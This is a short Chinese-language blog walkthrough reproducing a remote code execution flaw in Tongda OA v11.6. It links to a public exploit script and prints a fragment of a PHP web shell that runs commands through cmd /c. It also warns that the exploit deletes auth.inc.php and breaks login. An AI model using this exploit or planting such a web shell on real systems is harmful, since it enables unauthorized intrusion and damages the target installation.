通达OA v11.6 RCE 漏洞复现

0x01 复现准备

自行下载 v11.6 版本,我本地是 v11.3 用补丁升上去的

image

image.png

EXP脚本地址:https://github.com/TomAPU/poc_and_exp/blob/master/rce.py

0x02 EXP执行

执行 exp 成功 getshell

image
image

exp 写的 shell 执行命令返回 ret=127 ,应该是 disabled_function 造成的

image

换个马替换一下

exec("cmd /c ".$command);
    $stdout = $exec->StdOut();
    $stroutput = $stdout->ReadAll();
    echo $stroutput;
?>
image

搞定~~

0x03 需要注意的一点

利用该漏洞会强制删除 auth.inc.php 文件,谨慎使用

image
image

再次登陆
就边这B样了。。。


image.png

你可能感兴趣的:(通达OA v11.6 RCE 漏洞复现)